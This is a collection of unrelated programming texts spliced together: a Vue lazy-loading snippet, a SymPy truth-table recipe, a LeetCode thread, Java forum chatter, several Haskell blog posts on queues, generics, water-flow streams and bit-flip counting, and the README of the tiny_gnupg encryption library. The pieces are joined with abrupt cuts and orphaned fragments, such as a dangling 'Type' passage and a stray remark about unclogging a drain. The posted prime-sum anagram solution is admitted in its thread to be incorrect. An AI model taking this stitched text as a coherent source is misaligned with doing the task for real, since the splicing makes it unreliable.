      <transition name="fade">
        <img src="https://example.com/image.png">
      </transition>
      <transition name="fade" slot="placeholder">
        <div slot="placeholder">
          Loading....
        </div>
      </transition>
    </clazy-load>
  </div>
</template>

<style>
.fade-enter, .fade-leave-to {
  opacity: 0;
}
</style>
I can’t think of a much easier way to handle image preloading. If you can, feel free to send us a message! For now though, I believe vue-clazy-load can handle pretty much any lazy-loading situation. Enjoy!
15.6. Finding a Boolean propositional formula from a truth table
The logic module in SymPy lets us manipulate complex Boolean expressions, also known as propositional formulas.
This recipe will show an example where this module can be useful. Let's suppose that, in a program, we need to write a complex if statement depending on three Boolean variables. We can think about each of the eight possible cases (true/true/true, true/true/false, and so on) and decide what the outcome should be. SymPy offers a function to generate a compact logic expression that satisfies our truth table.
How to do it...
1. Let's import SymPy:
from sympy import *
init_printing()
2. Let's define a few symbols:
var('x y z')
3. We can define propositional formulas with symbols and a few operators:
P = x & (y | ~z)
P
4. We can use subs() to evaluate a formula on actual Boolean values:
P.subs({x: True, y: False, z: True})
5. Now, we want to find a propositional formula depending on x, y, and z, with the following truth table:
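The desired outcomes, reconstructed from the minterms and don't-care terms defined in the next step, are:

x y z | outcome
1 0 1 | True
1 0 0 | True
0 0 0 | True
1 1 1 | don't care
1 1 0 | don't care
0 0 1 | False
0 1 0 | False
0 1 1 | False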
6. Let's write down all combinations that we want to evaluate to True, and those for which the outcome does not matter:
minterms = [[1, 0, 1], [1, 0, 0], [0, 0, 0]]
dontcare = [[1, 1, 1], [1, 1, 0]]
7. Now, we use the SOPform() function to derive an adequate formula:
Q = SOPform(['x', 'y', 'z'], minterms, dontcare)
Q
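With these inputs, the simplified result should be equivalent to x | (~y & ~z): the x term covers (1,0,1) and (1,0,0), helped by the two don't-care rows, while ~y & ~z covers (0,0,0).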
8. Let's test that this proposition works:
Q.subs({x: True, y: False, z: False}), Q.subs({x: False, y: True, z: True})
How it works...
The SOPform() function generates a full expression corresponding to a truth table and simplifies it using the Quine-McCluskey algorithm. It returns the smallest Sum of Products form (a disjunction of conjunctions). Similarly, the POSform() function returns a Product of Sums.
The given truth table can occur in this case: suppose that we want to write a file if it doesn't already exist (z), or if the user wants to force the writing (x). In addition, the user can prevent the writing (y). The expression evaluates to True if the file is to be written. The resulting SOP formula works if we explicitly forbid x and y in the first place (forcing and preventing the writing at the same time is forbidden).
There's more...
Here are a few references:
- SymPy logic module documentation
- The propositional formula on Wikipedia
- Sum of Products on Wikipedia
- The Quine–McCluskey algorithm on Wikipedia
- Logic lectures on Awesome Math
Here is my solution to Find All Anagrams in a String, checking prime-number sums instead of checking whether arrays are equal:
import java.util.ArrayList;
import java.util.List;

public class Solution {
    public List<Integer> findAnagrams(String s, String p) {
        if (s.length() < p.length()) return new ArrayList<>();
        int[] letters = new int[]{ 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37,
                                   41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101 };
        int standard = 0, cache = 0;
        for (char c : p.toCharArray()) standard += letters[c - 'a'];
        for (int i = 0; i < p.length() - 1; i++) cache += letters[s.charAt(i) - 'a'];
        ArrayList<Integer> result = new ArrayList<>();
        for (int j = 0; j <= s.length() - p.length(); j++) {
            cache += letters[s.charAt(j + p.length() - 1) - 'a'];
            if (cache == standard) result.add(j);
            cache -= letters[s.charAt(j) - 'a'];
        }
        return result;
    }
}
It got an AC (2018-11-01 14:04), but soon I realized it cannot pass this test:
"op"
"by"
I don't know how to add test cases for this either, since there are so many possible prime-sum collisions, but just FYI. ;-P
@liupangzi Thanks, I have added the test case. However, please do note that it is easy for one to modify their hash functions / prime number combinations and still get Accepted. And it is impossible to add all kinds of test that will prevent all of them from getting Accepted.
Please see the following post for similar idea:
For my assignment I defined a MetaData class for the info from the class header, and clients call a getMetaData() method on the server to retrieve this info
You could create a new interface which extends DBMain and adds getMetaData(). That's what I did anyway.
public interface ExtendedDBAccess extends DBAccess {...} public class Data implements ExtendedDBAccess {...}
Hi Jim, Thank you very much. That's like a beautiful
Can U imagine clients that call the fields the same as they are called in an Oracle database?!
They take bookings only within 48 hours of the start of room occupancy.
"stupid developer"
Vlad: Andrew, have U implemented this logic (with 48h) also?
1) If we just forget about indexed search, where would you use the names of DB Columns : on the client, Data, or its extention and how? Can you give me a sample?
2) Do U beleive the indexed search is needed when the whole database is cashed?
3) What do you think specification means by saying we have to flexible search mechanism?
Working with constants works fine ... till the data format changes.
I’ve been doing a lot of experimenting with concurrent operations in haskell and in particular playing with and thinking about the design of concurrent FIFO queues. These structures are difficult to make both efficient and correct, due to the effects of contention on the parts of the structure tasked with coordinating reads and writes from multiple threads.
These are my thoughts so far on FIFO semantics.
In the interesting paper "How FIFO is your concurrent FIFO queue?" (PDF), A. Haas et al. propose that an ideal FIFO queue has operations that are instantaneous (think of each write having an infinitely accurate timestamp, and each read taking the corresponding element in timestamp order). They then measure the degree to which real queues of various designs deviate from this platonic FIFO semantics in their message ordering, using a metric they call "element-fairness". They experimentally measure the element-fairness of both so-called "strict FIFO" and "relaxed FIFO" designs, in which elements are read in more or less the order they were written (some providing guarantees about the degree of re-ordering, others not).
The first interesting observation they make is that no queue actually exhibits FIFO semantics by their metric; this is because of the realities of the way atomic memory operations like CAS may arbitrarily reorder a set of contentious writes.
The second interesting result is that the efficient-but-relaxed-FIFO queues which avoid contention by making fewer guarantees about message ordering often perform closer to ideal FIFO semantics (by their metric) than the “strict” but slower queues!
As an outsider, reading papers on FIFO queue designs I get the impression that what authors mean by “the usual FIFO semantics” is often ill-defined. Clearly they don’t mean the platonic zero-time semantics of the “How FIFO… ” paper, since they can’t be called FIFO by that measure.
I suspect what makes a queue “strict FIFO” (by the paper’s categorization) might simply be
If
write xreturns at time
T, then
xwill be read before the elements of any
writes that have not yet started by time
T.
The idea is difficult to express, but is essentially that FIFO semantics is only observable by way of actions taken by a thread after returning from a write (think: thread A writes x, then tells B, which writes y, where our program's correctness depends on the queue returning y after x). Note that since a queue starts empty, this is also sufficient to ensure writes don't "jump ahead" of writes already in the queue.
Imagine an absurd queue whose write never returns; there's very little one can say for certain about the "correct" FIFO ordering of writes in that case, especially when designing a program with a preempting scheduler that's meant to be portable. Indeed the correctness criterion above is probably a lot stricter than many programs require; e.g. when there is no coordination between writers, an observably-FIFO queue need only ensure that no reader thread sees two messages from the same writer thread out of order (I think).
The platonic zero-time FIFO ordering criterion used in the paper is quite different from this observable, correctness-preserving FIFO criterion; I can imagine it being useful for people designing “realtime” software.
Update 04/15/2014:
What I’m trying to describe here is called linearizability, and is indeed a well-understood and common way of thinking about the semantics of concurrent data structures; somehow I missed or misunderstood the concept!
At a certain level of abstraction, correct observable FIFO semantics shouldn't be hard to make efficient; after all, the moments during which we have contention (and horrible performance) are also the moments during which we don't care about (or have no way of observing) correct ordering. In other words (although we have to be careful of the details) a thread-coordination scheme that breaks down (w/r/t element-fairness) under contention isn't necessarily a problem. Compare-and-swap does just that; unfortunately, it breaks down in a way that is slower rather than faster.
This is the first real release of shapely-data, a haskell library up here on hackage for working with algebraic datatypes in a simple generic form made up of haskell's primitive product, sum and unit types: (,), Either, and ().
You can install it with
cabal install shapely-data
In order from most to least important to me, here are the concerns that motivated the library:
Provide a good story for (,)/Either as a lingua franca generic representation that other library writers can use without dependencies, encouraging abstractions in terms of products and sums (motivated specifically by my work on simple-actors).

Support algebraic operations on ADTs, making types composable
-- multiplication:
let a = (X,(X,(X,())))
    b = Left (Y,(Y,())) :: Either (Y,(Y,())) (Z,())
    ab = a >*< b
 in ab == ( Left (X,(X,(X,(Y,(Y,())))))
              :: Either (X,(X,(X,(Y,(Y,()))))) (X,(X,(X,(Z,())))) )

-- exponents, etc:
fanout (head,(tail,(Prelude.length,()))) [1..3] == (1,([2,3],(3,())))
(unfanin (_4 `ary` (shiftl . Sh.reverse)) 1 2 3 4) == (3,(2,(1,(4,()))))
Support powerful, typed conversions between Shapely types
data F1 = F1 (Maybe F1) (Maybe [Int]) deriving Eq
data F2 = F2 (Maybe F2) (Maybe [Int]) deriving Eq

f2 :: F2
f2 = coerce (F1 Nothing $ Just [1..3])

data Tsil a = Snoc (Tsil a) a | Lin deriving Eq

truth = massage "123" == Snoc (Snoc (Snoc Lin '3') '2') '1'
Lowest on the list is supporting abstracting over different recursion schemes or supporting generic traversals and folds, though some basic support is planned.
Finally, in at least some cases this can completely replace GHC.Generics and may be a bit simpler. See examples/Generics.hs for an example of the GHC.Generics wiki example ported to shapely-data. And for a nice view of the changes that were required, do:

git show 3a65e95 | perl /usr/share/doc/git/contrib/diff-highlight/diff-highlight
The GHC.Generics representation has a lot of metadata and a complex structure that can be useful for deriving default instances; more important to us is to have a simple, canonical representation such that two types that differ only in constructor names can be expected to have identical generic representations.
This supports APIs that are type-agnostic (e.g. a database library that returns a generic Product, convertible later with to), and allows us to define algebraic operations and composition & conversion functions.
In this post Philip Nilsson describes an inspiring, principled approach to solving a toy problem posed in a programming interview. I wanted to implement a solution to a variant of the problem where we’d like to process a stream. It was pretty easy to sketch a solution out on paper but Philip’s solution was invaluable in testing and debugging my implementation. (See also Chris Done’s mind-melting loeb approach)
My goal was to have a function:
waterStream :: [Int] -> [Int]
that would take a possibly-infinite list of columns and return a stream of known water quantities, where volumes of water are output as soon as possible. We can get a solution to the original problem, then, with:
ourWaterFlow = sum . waterStream
Here is the solution I came up with, with inline explanation:
{-# LANGUAGE BangPatterns #-}

-- start processing `str` initializing the highest column to the left at 0, and
-- an empty stack.
waterStream :: [Int] -> [Int]
waterStream str = processWithMax 0 str []

processWithMax :: Int -> [Int] -> [(Int,Int)] -> [Int]
processWithMax prevMax = process where
    process [] = const []
    -- output the quantity of water we know we can get, given the column at the
    -- head of the stream, `y`:
    process (y:ys) = eat 1 where
        eat !n xxs@((offset,x):xs)
            -- done with `y`, push it and its offset onto the stack
            | y < x = process ys ((n,y):xxs)
            -- at each "rise" we can output some known quantity of water;
            -- storing the "offset" as we did above lets us calculate water
            -- above a previously filled "valley"
            | otherwise =
                let col  = offset*(min y prevMax - x)
                    cols = eat (n+offset) xs
                    -- filter out zeros:
                 in if col == 0 then cols else col : cols
        -- if we got to the end of the stack, then `y` is the new highest
        -- column we've seen.
        eat !n [] = processWithMax y ys [(n,y)]
The bit about “offsets” is the tricky part which I don’t know how to explain without a pretty animation.
It took me much longer than I was expecting to code up the solution above that worked on a few hand-drawn test cases, and at that point I didn't have high confidence that the code was correct, so I turned to quickcheck and assert.
First I wanted to make sure the invariant that the “column” values in the stack were strictly increasing held:
import Control.Exception (assert)

...

--process (y:ys) = eat 1
process (y:ys) stack = assert (stackSane stack) $ eat 1 stack

...
Then I used Philip’s solution (which I had confidence in):
waterFlow :: [Int] -> Int
waterFlow h = sum $ zipWith (-) (zipWith min (scanl1 max h) (scanr1 max h)) h
to test my implementation:
*Waterflow> import Test.QuickCheck
*Waterflow Test.QuickCheck> quickCheck (\l -> waterFlow l == ourWaterFlow l)
*** Failed! Falsifiable (after 21 tests and 28 shrinks):
[1,0,0,0,1]
Oops! It turned out I had a bug in this line (fixed above):
--old buggy:
--cols = eat (n+1) xs

--new fixed:
cols = eat (n+offset) xs
The solution seems to perform pretty well, processing 1,000,000 Ints in 30ms on my machine:
import Criterion.Main
import Control.Monad (replicateM)
import System.Random.MWC (create, uniformR)

main = do
    gen <- create
    rs <- replicateM 1000000 $ uniformR (0,100) gen
    defaultMain [ bench "ourWaterFlow" $ whnf ourWaterFlow rs ]
I didn’t get a good look at space usage over time, as I was testing with
mwc-random which doesn’t seem to support creating a lazy infinite list of
randoms and didn’t want to hunt down another library. Obviously on a stream
that simply descends forever, our stack of
(Int,Int) will grow to infinite
size.
It seems as though there is a decent amount of parallelism that could be exploited in this problem, but I didn’t have any luck on a quick attempt.
Have a parallel solution, or something just faster? Or an implementation that doesn’t need a big stack of previous values?
Type
That should give you an intuition. At this point you might want to stop and read through the following documentation, or continue reading below before coming back to these links for a more refined understanding and additional details:

TypeFamilies provides the syntax a ~ b to indicate type equality constraints; this is especially useful with type synonym functions, but can be useful on its own as well.
After pouring 1.5 bottles of horrid caustic chemicals down the drain to no avail, I found I was able to clear a tough clogged shower drain with just the empty bottle:
Don’t get boiling water in your eyes.
Disclaimer: un-researched, under-educated, fast and loose hacking follows.
The other day I was thinking about counting in binary and how bits cascade when incrementing a counter.
000
001
010
011
100
I wondered: what if each bit flip was very "expensive", for the hardware say? Are there other methods we could use that would result in a "cheaper" increment operation, by avoiding those costly carries?
First, here’s a little bit of boring code that we’ll use below to print a list of Ints as padded binary, and some requisite imports:
import Data.Bits
import Data.Word
import Numeric
import Text.Printf
import Data.Char

prettyPrintBits :: (Integral i, Show i)=> [i] -> IO ()
prettyPrintBits = mapM_ putStrLn . prettyListBits

prettyListBits :: (Integral i, Show i)=> [i] -> [String]
prettyListBits l = map (printPadded . toBin) l
    where toBin i = showIntAtBase 2 intToDigit i ""
          printPadded = printf ("%0"++width++"s")
          width = show $ ceiling $ logBase 2 $ (+1) $ fromIntegral $ maximum l
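As a quick check, this reproduces the little counting table from above:

*Main> prettyPrintBits [0..4 :: Word]
000
001
010
011
100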
Anyway I started playing with this by hand, with a 3-bit example, and drawing funny pictures like these:
On the left is a table with the cost, in bit-flips, to increment a binary counter to that number, from the previous.
Then (in the middle of the pic above) I drew an undirected graph with edges connecting the numbers that differed by only a single bit (lots of symmetry there, no?); so what we’d like to do is walk that graph without repeating, to cycle through all the 3-bit combinations as “efficiently” as possible.
After doodling for a second I found a nice symmetrical path through the graph, and wrote the numbers we pass through in sequence (on the right side of the pic above).
Okay, but can we write a program to generate that sequence? And generalize it?
After I marked the bit-flip locations in the “bit-economical” binary sequence, I noticed the pattern from top to bottom is the same as what we’d use to build a binary tree from an ordered list, numbered from the bottom up.
Furthermore, glancing back at my original table of "increment costs", I noticed they follow the same pattern; it turns out we can use a few simple bitwise operations on a normal binary count to enumerate all n-bit numbers with optimally-efficient bit flips. The algorithm is:

1. take the bitwise difference (XOR) of adjacent numbers in a normal binary count

2. count the 1s in the result (POPCNT) and subtract one; that gives the index of the next bit to flip
Here’s an implementation in haskell that represents an infinite (sort of) efficient bit count:
lazyBits :: [Word]
lazyBits = scanl complementBit 0 bitsToFlip
    where ns = [0..] :: [Word]
          bitsToFlip = zipWith (\x-> subtract 1 . popCount . xor x) ns $ tail ns
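To see one step of that by hand: between the ordinary counts 1 (001) and 2 (010), the XOR marks the bits that would have flipped, and its popcount (minus one) picks the single bit we flip instead:

*Main> xor 1 2 :: Word
3
*Main> popCount (xor (1 :: Word) 2) - 1
1
*Main> complementBit (1 :: Word) 1
3

...which is exactly how lazyBits steps from 1 to 3.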
We can play with this & pretty-print the result:
*Main Text.Printf> take (2^3) $ lazyBits
[0,1,3,2,6,7,5,4]
*Main Text.Printf> prettyPrintBits $ take (2^3) $ lazyBits
000
001
011
010
110
111
101
100
This is similar to de Bruijn sequences and I’m sure this sort of sequence has some interesting applications. For instance just as with de Bruijn sequences I could see this being useful in cracking an imaginary lock consisting of toggling push-button digits.
But most real locks like that have buttons that lock in place and have a single "reset" button. To model those we could do something similar to what we just did, only we'd want to study a directed graph where we only ever have edges resulting from flipping a 0 to a 1, and all numbers have an edge back to 0.
We’ve gotten side-tracked a bit. We started wanting to find a more efficient binary number system for incrementing, but is that what we got?
Well, no. In particular we have no algorithm for incrementing an arbitrary number in our sequence. For instance, given only the number 010 we have no way (that I've been able to figure out) of knowing that the left-most bit should be flipped. In other words we need some amount of state to determine the next bit to be flipped. At least that's my assumption.
One thing we do have is a method for comparing numbers in the sequence, something that’s pretty much essential if you want to do anything with a counter.
Here is some code to do just that, defined here in terms of bit strings (as output by prettyListBits); I haven't figured out a clever set of bitwise ops to do this, and have a somewhat foggy idea of why this works:
compareNums :: String -> String -> Ordering
compareNums [] [] = EQ
compareNums ('0':as) ('0':bs) = compareNums as bs
compareNums ('1':as) ('1':bs) = invert $ compareNums as bs
    where invert EQ = EQ
          invert GT = LT
          invert LT = GT
compareNums (a:_) (b:_) = compare a b
compareNums _ _ = error "this assumes 0-padded, aligned numbers"
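Checking a couple of pairs against the 3-bit sequence above (001 is the 2nd entry, 010 the 4th, 110 the 5th):

*Main> compareNums "001" "010"
LT
*Main> compareNums "110" "010"
GT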
So how much does it really cost on average to increment an arbitrary number in the usual binary number system? We know it’s more than one, but we need a function from bit length to average cost.
To do that efficiently we’ll once again use the pattern we discovered above when we sketched out a 3-bit example. Looking at the way the different costs break down we have:
4 operations at cost 1
2 operations at cost 2
1 operation at cost 3
…out of a total of 8 - 1 increment operations, so the average cost is:

(4*1 + 2*2 + 1*3) / (8 - 1) = 1.5714

So a general function for b bits would look like:
amortizedIncrCost :: Integer -> Double
amortizedIncrCost b = avgd $ sum $ zipWith (*) (iterate (2*) 1) [b,b-1 ..1]
    where avgd n = (fromIntegral n) / (2^b - 1)
We'd like to know how this behaves as our number of bits b approaches infinity. We could take the limit of the function, but who knows how to do that, so let's just experiment:
*Main> amortizedIncrCost 3
1.5714285714285714
*Main> amortizedIncrCost 4
1.7333333333333334
*Main> amortizedIncrCost 8
1.968627450980392
*Main> amortizedIncrCost 16
1.9997558556496529
*Main> amortizedIncrCost 32
1.9999999925494194
*Main> amortizedIncrCost 64
2.0
Seems quite clearly to approach 2 as we exceed the accuracy of our Double, i.e. the average cost to increment an arbitrary-size binary counter is two bit flips. Interesting!
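If we do want the limit: each cost-k increment occurs 2^(b-k) times in a full b-bit count, and that sum has a tidy closed form. Here's a hand-derived version (worth double-checking) we can test against the numbers above:

-- total bit flips over a full b-bit count;
-- equals sum [ k * 2^(b-k) | k <- [1..b] ]
totalFlips :: Integer -> Integer
totalFlips b = 2^(b+1) - b - 2

For b = 3 that's 16 - 3 - 2 = 11, matching 4*1 + 2*2 + 1*3 above, and (2^(b+1) - b - 2) / (2^b - 1) tends to exactly 2 as b grows.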
Remember above how we mentioned our counting system required some additional state to determine the next bit to flip? Well a single bit is the smallest unit of state we know about; therefore even if we could figure out how to determine bit-flips with a single bit of state, or could derive a way of calculating the offset from the number itself, we’d still never be able to do better than two bit-flips per increment.
This is probably all pretty obvious information theory stuff, but was a fun little diversion.
tiny_gnupg - A small-as-possible solution for handling GnuPG ed25519 ECC keys.
Project description
A linux specific, small, simple & intuitive wrapper for creating, using and managing GnuPG's Ed25519 curve keys. In our design, we favor reducing code size & complexity with strong, biased defaults over flexibility in the api. Our goal is to turn the powerful, complex, legacy gnupg system into a fun and safe tool to develop with.
This project is currently in unstable beta. It works like a charm, but there are likely bugs floating around, and the api is subject to change. Contributions are welcome.
Install
sudo apt-get install tor torsocks gnupg2 gpg-agent
pip install --user --upgrade tiny_gnupg
Basic Commands
The GnuPG class’s instances are the primary interface for running commands & managing keys using the gpg2 executable.
from tiny_gnupg import GnuPG, run

PATH_TO_GPG_BINARY = "/usr/bin/gpg2"

gpg = GnuPG(
    email_address="bob@user.net",
    passphrase="bobs's passphrase",
    executable=PATH_TO_GPG_BINARY,
)

# This will generate a primary ed25519 ECC certifying key, and three
# subkeys, one each for the authentication, encryption, and signing
# functionalities.
gpg.generate_key()

# Now this fingerprint can be used with arbitrary gpg2 commands.
gpg.fingerprint

# But the key is stored in the package's local keyring. To
# talk to the package's gpg environment, an arbitrary command
# can be constructed like this ->
options = ["--armor", "--encrypt", "-r", gpg.fingerprint]
command = gpg.encode_command(*options)
inputs = gpg.encode_inputs("Message to myself")
encrypted_message = gpg.read_output(command, inputs)

# If a command would invoke the need for a passphrase, the
# with_passphrase kwarg should be set to True ->
command = gpg.encode_command(*options, with_passphrase=True)

# The passphrase then needs to be the first arg passed to
# encode_inputs ->
inputs = gpg.encode_inputs(gpg.user.passphrase, *other_inputs)

# The list of keys in the package's environment can be accessed
# from the list_keys() method, which returns a dict ->
gpg.list_keys()
>>> {fingerprint: email_address, ...}

# Or retrieve a specific key where a searchable portion of its uid
# information is known, like an email address or fingerprint ->
gpg.list_keys("bob@user.net")
>>> {"EE36F0584971280730D76CEC94A470B77ABA6E81": "bob@user.net"}

# Let's try encrypting a message to Alice, whose public key is
# stored on keys.openpgp.org/

# First, we'll import Alice's key from the keyserver (This requires
# a Tor system installation. Or an open TorBrowser, and the tor_port
# attribute set to 9150) ->
# Optional: gpg.keyserver.network.tor_port = 9150
run(gpg.network_import(uid="alice@email.domain"))

# Then encrypt a message with Alice's key and sign it ->
msg = "So, what's the plan this Sunday, Alice?"
encrypted_message = gpg.encrypt(
    message=msg, uid="alice@email.domain", sign=True
)

# The process of encrypting a message to a peer whose public key
# might not be in the local package keyring is conveniently available
# in a single method. It automatically searches for the recipient's
# key on the keyserver so it can be used to encrypt the message ->
run(gpg.auto_encrypt(msg, "alice@email.domain"))  # Signing is automatic

# We could directly send a copy of our key to Alice, or upload it to
# the keyserver. Alice will need a copy so the signature on the
# message can be verified. So let's upload it to the keyserver ->
run(gpg.network_export(uid="bob@user.net"))

# Alice could now import our key (after we do an email verification
# with the keyserver) ->
run(gpg.network_import("bob@user.net"))

# Then Alice can simply receive the encrypted message and decrypt it ->
decrypted_msg = gpg.decrypt(encrypted_message)

# The process of decrypting an encrypted & signed message from a peer
# whose public key might not be in the local package keyring is
# conveniently available in a single method. It automatically determines
# the signing key fingerprint, and searches for it on the keyserver
# to verify the signature ->
decrypted_msg = run(gpg.auto_decrypt(encrypted_message))
On most systems, because of a bug in GnuPG, email verification of uploaded keys will be necessary for others to import them from the keyserver. That’s because GnuPG will throw an error immediately upon trying to import keys with their uid information stripped off.
The package no longer comes with its own gpg2 binary. Your system gpg2 executable is probably located at: /usr/bin/gpg2. You could also type: whereis gpg2 to find it. If it’s not installed, you’ll have to install it with your system’s equivalent of: sudo apt-get install gnupg2
Networking Examples
# Since we use SOCKSv5 over Tor for all of our networking, as well
# as the user-friendly aiohttp + aiohttp_socks libraries, the Tor
# networking interface is also available to users. These utilities
# allow arbitrary POST and GET requests to clearnet, or onionland,
# websites ->
from tiny_gnupg import GnuPG, Network, run

client = Network(tor_port=9050)

async def read_url(client, url):
    """
    Use the instance's interface to read the page located at the url
    with a wrapper around an `aiohttp.ClientSession` context manager.
    """
    async with client.context_get(url) as response:
        return await response.text()

# Now we can read webpages with GET requests ->
page_html = run(read_url(client, ""))

# Let's try onionland ->
url = ""
onion_page_html = run(read_url(client, url))

# Check your ip address for fun ->
ip_addr = run(read_url(client, ""))

# There's a convenience function built into the class that
# basically mimics read_url() ->
ip_addr = run(client.get(""))

# POST requests can also be sent with the context_post() method.
# Let's use a POST request to send the keyserver a new key we
# create ->
async def post_data(client, url, payload=""):
    """
    Use the instance's interface to post the api payload to the
    keyserver with a wrapper around an `aiohttp.ClientSession`
    context manager.
    """
    async with client.context_post(url, json=payload) as response:
        return await response.text()

gpg = GnuPG(email_address="bob@user.net", passphrase="bobs's passphrase")
gpg.generate_key()

url = gpg.keyserver._key_export_api_url
payload = {"keytext": gpg.text_export(uid=gpg.fingerprint)}
api_token_json = run(post_data(client, url, payload))

# There's also a convenience function built into the class that
# mimics post_data() ->
api_token_json = run(client.post(url, json=payload))

# Of course, this is just for demonstration. The method that should
# be used for uploading a key to the keyserver is network_export ->
run(gpg.network_export(gpg.fingerprint))

# And there we have it, it's super simple. And these requests have
# the added benefit of being completely routed through Tor. The
# keyserver here also has a v3 onion address which we use to query,
# upload, and import keys. This provides a nice, default layer of
# privacy to our communication needs.
These networking tools work off instances of aiohttp.ClientSession. To learn more about how to use their POST and GET requests, you can read the docs here.
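As a rough sketch of what those context managers are doing under the hood (illustrative only; tor_get is not part of tiny_gnupg's api), the same Tor-routed GET can be written directly with aiohttp + aiohttp_socks:

import asyncio

import aiohttp
from aiohttp_socks import ProxyConnector

async def tor_get(url, tor_port=9050):
    # Route the request through the local Tor SOCKSv5 proxy.
    connector = ProxyConnector.from_url(f"socks5://127.0.0.1:{tor_port}")
    async with aiohttp.ClientSession(connector=connector) as session:
        async with session.get(url) as response:
            return await response.text()

# e.g. asyncio.run(tor_get("https://check.torproject.org/"))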
About Torification
A user can make sure that any connections the gnupg binary makes with the network are always run through Tor by setting torify=True during initialization.
from tiny_gnupg import GnuPG

gpg = GnuPG(**user_details, torify=True)
This is helpful because there are gnupg settings which cause certain commands to do automatic connections to the web. For instance, when encrypting, gnupg may be set to automatically search for the recipient's key on a keyserver if it's not in the local keyring. This doesn't normally affect tiny_gnupg because it doesn't use gnupg's networking interface. It ensures Tor connections through the aiohttp_socks library. But, if gnupg does make these kinds of connections silently, using torify can prevent a user's IP address from being inadvertently revealed.
Using torify requires a Tor installation on the user system. If the user is running Debian / Ubuntu, then this guide could be helpful.
More Commands
# An instance can also be constructed from lower-level objects ->
from tiny_gnupg import BaseGnuPG, User, GnuPGConfig, run

PATH_TO_GPG_BINARY = "/usr/bin/gpg2"

# Passphrases can contain any characters, even emojis ->
user = User(email_address="bob@user.net", passphrase="✅🐎🔋📌")
config = GnuPGConfig(executable=PATH_TO_GPG_BINARY, torify=True)
gpg = BaseGnuPG(user, config=config)

# It turns out that the encrypt() method automatically signs the
# message being encrypted. So, the `sign=False` flag only has to be
# passed when a user doesn't want to sign a message ->
encrypted_unsigned_message = gpg.encrypt(
    message="sending message as an unidentified sender",
    uid="alice@email.domain",  # sending to alice,
    sign=False,  # no sender identification
)

# It also turns out, a user can sign things independently from
# encrypting ->
message_to_verify = "maybe a hash of a file?"
signed_data = gpg.sign(target=message_to_verify)
assert message_to_verify == gpg.decrypt(signed_data)

# And verify a signature without checking the signed value ->
gpg.verify(message=signed_data)  # throws if invalid

# Or sign a key in the package's keyring ->
gpg.sign("alice@email.domain", key=True)

# Importing key files is also a thing ->
path_to_file = "/home/user/keyfiles/"
gpg.file_import(path=path_to_file + "alices_key.asc")

# As well as exporting public keys ->
gpg.file_export(path=path_to_file, uid=gpg.user.email_address)

# And secret keys, but really, keep those safe! ->
gpg.file_export(
    path=path_to_file, uid=gpg.user.email_address, secret=True
)

# The keys don't have to be exported to a file. Instead they can
# be exported as strings ->
my_key = gpg.text_export(uid=gpg.fingerprint)

# So can secret keys (Be careful!) ->
my_secret_key = gpg.text_export(gpg.fingerprint, secret=True)

# And they can just as easily be imported from strings ->
gpg.text_import(key=my_key)
Retiring Keys
After a user no longer considers a key useful, or wants to dissociate from the key, then they have some options:
from tiny_gnupg import GnuPG, run

PATH_TO_GPG_BINARY = "/usr/bin/gpg2"

gpg = GnuPG(
    email_address="bob@user.net",
    passphrase="bobs's passphrase",
    executable=PATH_TO_GPG_BINARY,
)

# They can revoke their key then distribute it publicly (somehow)
# (the keyserver can't currently handle key revocations) ->
revoked_key = gpg.revoke(gpg.fingerprint)  # <-- Distribute this!

# Uploading the revoked key will only strip the user ID information
# from the key on the keyserver. It won't explicitly let others know
# the key has been retired. However, this action cannot be undone ->
run(gpg.network_export(gpg.fingerprint))

# The key can also be deleted from the package keyring like this ->
gpg.delete(uid="bob@user.net")
Known Issues
- Because of Debian bug #930665, & related GnuPG bug #T4393, importing keys from the default keyserver keys.openpgp.org doesn’t work automatically on all systems. Not without email confirmation, at least. That’s because the keyserver will not publish uid information attached to a key before a user confirms access to the email address assigned to the uploaded key. And, because GnuPG folks are still holding up the merging, & back-porting, of patches that would allow GnuPG to automatically handle keys without uids gracefully. This affects the network_import() method specifically, but also the text_import() & file_import() methods, if they happen to be passed a key or filename argument which refers to a key without uid information. The gpg2 binary in this package can be replaced manually if a user’s system has access to a patched version.
- Because of GnuPG bug #T3065, & related bug #1788190, the --keyserver & --keyserver-options http-proxy options won’t work with onion addresses, & they cause a crash if a keyserver lookup is attempted. This is not entirely an issue for us since we don’t use gnupg’s networking interface. In fact, we set these environment variables anyway to crash on purpose if gnupg tries to make a network connection. And in case the bug ever gets fixed (it won’t), or by accident the options do work in the future, then a tor SOCKSv5 connection will be used instead of a raw connection.
- This program may only be reliably compatible with keys that are also created with this program. That’s because our terminal parsing relies on specific metadata being similar across all encountered keys. It seems most keys have successfully been parsed with recent updates, though more testing is needed.
- The tests don’t currently work when a tester’s system has a system installation of tiny_gnupg, & the tests are being run from a local git repo directory. That’s because the tests import tiny_gnupg, but if the program is installed in the system, then python will get confused about which keyring to use during the tests. This will lead to crashes & failed tests. Git clone testers probably have to run the test script closer to their system installation, one directory up & into a tests folder. Or pip uninstall tiny_gnupg. OR, send a pull request with an import fix.
- Currently, the package is part synchronous, & part asynchronous. This is not ideal, so a decision has to be made: either to stay mixed style, or choose one consistent style.
- We’re still in unstable beta & have to build out our test suite. Contributions welcome.
- The tests seem to fail on some systems because of a torsocks filter [1][2] which blocks some syscalls. This may be patched or not applicable on non-linux operating systems.
Changelog
Changes for version 0.9.0
Major Changes
- The passphrase keyword argument is now processed through the hashlib.scrypt function before being stored within a User instance & used within the GnuPG & BaseGnuPG classes. The GnuPG & BaseGnuPG classes also accept an optional salt keyword-only argument. These changes secure user keys & passwords by default with a memory-hard key derivation function & the uniqueness of the user-specified random salt. These changes provide better security & aren’t backwards compatible.
- The email keyword argument to the User, BaseGnuPG & GnuPG classes was changed to email_address. The attributes in the User class have also mirrored this change. As well, the key_email method on the GnuPG & BaseGnuPG classes is now key_email_address.
- The User class now does type & value checking on the username, email_address & passphrase strings passed into the __init__, as well as whenever their associated property attributes are set.
Minor Changes
- Documentation improvements.
- Various refactorings & code cleanups.
- More type hinting was added & improved upon.
- Removed the improper usage of the NoneType for type hinting.
- New constants were added to the tiny_gnupg.py module to specify problematic control & whitespace characters that shouldn’t be used in various user-defined inputs & credentials.
- The file_export methods of the GnuPG & BaseGnuPG classes now save key files with either "public-key_" or "secret-key_" strings prepended to them to better specify for users the context of files saved to their filesystems.
- Removed the svg image file which didn’t accurately report the line coverage with the new changes to the package.
Changes for version 0.8.2
Minor Changes
- Documentation improvements.
